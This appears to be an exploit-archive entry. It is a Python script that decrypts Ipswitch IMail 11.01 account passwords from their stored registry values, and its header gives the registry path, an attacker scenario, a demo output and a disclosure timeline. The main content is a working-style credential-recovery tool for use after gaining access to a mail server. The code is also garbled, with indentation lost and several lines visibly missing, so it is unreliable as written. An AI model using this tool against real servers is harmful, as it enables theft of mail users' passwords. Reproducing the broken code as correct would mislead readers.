# Ipswitch IMail Server - IMAP4 Server (IMail 11.01) Password Decryptor
# Tested on: Windows XP SP3 (Windows version does not matter)
# Description:
# So I reverse engineered the IMail password decryption function in
# IMailsec.dll, located at 0x00563130.
# In order to decrypt correctly, you must have the correct username,
# because it is used as a key.
# All usernames and passwords are stored in registry, which can be
# found at:
# HKEY_LOCAL_MACHINE\SOFTWARE\Ipswitch\IMail\Domains\[domain name]\Users
# Every registry key under "Users" has a string value named "Password",
# in there you'll find the encrypted password.
# By default, Internet Guest Account is granted with "Full Control" to
# the IMail registry, and its directory. That means if an attacker
# manages to gain code execution (ie.via a web app bug), IMail can be
# his/her next playground. And IMail users may not be safe.
# Demo:
# sinn3r@bt4:~$ ./iMailDecrypt.py admin C8D3D19AA094
# Ipswitch IMail Server - IMAP4 Server (IMail 11.01) Password Decryptor
# coded by sinn3r - x90.sinner{at}gmail.c0m
# [*] Password = god123
# Responsible Disclosure Timeline:
# 1/21/2010 - IMail vendor contacted
# 1/26/2010 - Got a reply from the vendor for more vulnerability
# clarfication. No fix yet.
# 2/02/2010 - Received another reply from the vendor: Issues logged for
# additional research. No plans for immediate changes.
# A public advisory was also suggested by the vendor as
# reference in their tech/KB article.
# 2/04/2010 - Public Disclosure. Vendor informed again.
import sys
import binascii
## Convert the encrypted string to integers for calculation
## Returns the integer version as a list
def convertToInt(data):
charset = []
for char in (data):
tmp = char.encode("hex")
tmp = int(tmp, 16)
return charset
## Decrypt the password
## Returns the decrypted version as a list
def decryptPassword(intUsername, intPassword):
results = []
counter = 0
counter2 = 0
pwdLength = len(intPassword)
while counter<pwdLength:
firstByte = intPassword[counter]
if firstByte <= 57: #0x39
firstByte -= 48 #0x30
firstByte -= 55 #0x37
firstByte *= 16 #SHL 0x40
secondByte = intPassword[counter+1]
if secondByte <= 57: #0x39
secondByte -= 48 #0x30
secondByte -= 55 #0x37
tmp = firstByte + secondByte
if len(intUsername) <= counter2:
counter2 = 0
if intUsername[counter2] > 54: #0x41
if intUsername[counter2] < 90: #5A
intUsername[counter2] += 32 #0x20
tmp -= intUsername[counter2]
counter2 += 1
counter += 2
return results
banner = """Ipswitch IMail Server - IMAP4 Server (IMail 11.01) Password Decryptor coded by sinn3r - x90.sinner{at}gmail{d0t}c0m"""
print banner
if len(sys.argv) == 3:
if len(sys.argv[2]) % 2 == 0:
username = convertToInt(sys.argv[1])
password = convertToInt(sys.argv[2])
decryptor = str("".join(decryptPassword(username, password)))
print "[*] Password = %s" %binascii.unhexlify(decryptor)
print "[*] Incorrect Encrypted password length"
print "[*] Usage: %s <username> <encrypted password>" %sys.argv[0]